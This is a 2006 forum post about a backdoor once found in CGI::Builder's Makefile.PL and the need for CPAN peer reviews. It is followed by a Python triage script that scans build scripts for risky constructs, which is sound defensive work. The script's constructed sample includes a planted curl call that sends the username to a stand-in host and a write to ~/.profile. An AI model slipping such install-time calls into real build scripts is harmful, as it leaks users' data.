- Mumia W.
August 21, 2006, 7:13 am
While reading the reviews on CPAN, I noticed an informative
review of CGI::Builder. Evidently, back in 2004,
CGI::Builder's Makefile.PL had backdoor code in it:
A recently-downloaded version of the module doesn't have this
code in it, so evidently the author removed it after receiving
some criticism, but this points up a problem.
As well-respected as CPAN is, it seems to be perpetually "open
for business," and that means that anyone can put anything
they want on there, and that means that some of the module
authors can get into your business.
Perhaps we need a peer-review system for CPAN. The reviews
site on CPAN may be that, but I hadn't seen it because I
usually look for modules in the CPAN shell.
What I would like is to be able to type this in the CPAN shell:
cpan> reviews CGI::Builder
And I would get a text page listing reviews of the module done
by trustworthy people.
Domizio Demichelis, the author of CGI::Builder, is also
reputed to have created a number of sockpuppets to tout his
module <http://cpanratings.perl.org/user/ovid>, and so some
system would have to be in place to ensure that most of the
"peers" are not the module author.
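The practical point behind the post is that Makefile.PL is ordinary Perl which `cpan` executes with the installing user's privileges before the module itself is ever loaded, so a backdoor there runs at install time. The script below is an added example, not code from the post, from CGI::Builder or from CPAN: it does a coarse static triage of a Makefile.PL and reports lines containing constructs that a plain ExtUtils::MakeMaker build script has no reason to use. The sample build script embedded in it is constructed for illustration and is not the real CGI::Builder code (the post does not reproduce that); the pattern list and the labels are the example's own choices.

```python
"""Static triage of a CPAN distribution's Makefile.PL before letting cpan run it.

Heuristic only: a clean report means "nothing obvious", not "benign".
Usage: python triage_makefile_pl.py [path/to/Makefile.PL]
Without an argument it scans the constructed sample below.
"""
import re
import sys

# (label, regex) pairs a reviewer wants flagged in a build script. The regexes
# are deliberately loose; false positives are cheap because a human reads the
# report, while a miss lets the install proceed unquestioned.
SUSPICIOUS = [
    ("shell execution", re.compile(r"\b(?:system|exec|qx)\b|`[^`]*`")),
    ("pipe open", re.compile(r"\bopen\b[^;]*?['\"](?:\||[^'\"]*\|\s*)['\"]")),
    ("network access", re.compile(r"\b(?:IO::Socket|LWP::|HTTP::Tiny|Net::|socket\s*\()|https?://")),
    ("string eval", re.compile(r"\beval\s*(?:\(|['\"$])")),
    ("file removal/permission change", re.compile(r"\b(?:unlink|rmtree|chmod|chown)\b")),
    ("writes outside the build dir", re.compile(r"['\"](?:/etc/|/usr/|/bin/|~/|\$ENV\{HOME\})")),
    ("obfuscated payload", re.compile(r"\b(?:pack|unpack)\s*\(\s*['\"]H\*|decode_base64|(?:\\x[0-9a-fA-F]{2}){8,}")),
]

# Constructed sample: a normal MakeMaker script with two planted statements
# appended. It is NOT the real CGI::Builder Makefile.PL.
SAMPLE_MAKEFILE_PL = """\
use ExtUtils::MakeMaker;
# Constructed sample build script, not any real distribution's Makefile.PL.
WriteMakefile(
    NAME         => 'Example::Module',
    VERSION_FROM => 'lib/Example/Module.pm',
    PREREQ_PM    => { 'CGI' => 0 },
);
# The two statements below are the constructed "backdoor" the triage should flag.
open(my $fh, ">>", "$ENV{HOME}/.profile");
system("curl -s http://example.invalid/ping?u=$ENV{USER}");
"""


def triage_makefile_pl(text):
    """Return a list of (line_number, label, stripped_line) findings.

    Full-line comments are skipped because they never execute. Inline comments
    are not stripped: code before a '#' still runs, and a naive stripper could
    be fooled by a '#' inside a string.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for label, pattern in SUSPICIOUS:
            if pattern.search(line):
                findings.append((lineno, label, stripped))
    return findings


def format_report(findings):
    """Human-readable report; one line per finding, line numbers first."""
    if not findings:
        return "no suspicious constructs found (heuristic only; still read the file)"
    return "\n".join(f"line {n}: {label}: {src}" for n, label, src in findings)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            source = fh.read()
    else:
        source = SAMPLE_MAKEFILE_PL
    print(format_report(triage_makefile_pl(source)))
```

Run it against an unpacked distribution (`cpan` keeps them under `~/.cpan/build/`) before the `make` step, or wire it into a `cpan` pre-install hook of your own. On the constructed sample it flags line 9 for writing under `$ENV{HOME}` and line 10 twice, for the `system` call and for the URL. A regex scan cannot follow string concatenation or `eval`'d data, so treat a clean report as a reason to read the file, not a reason to skip it.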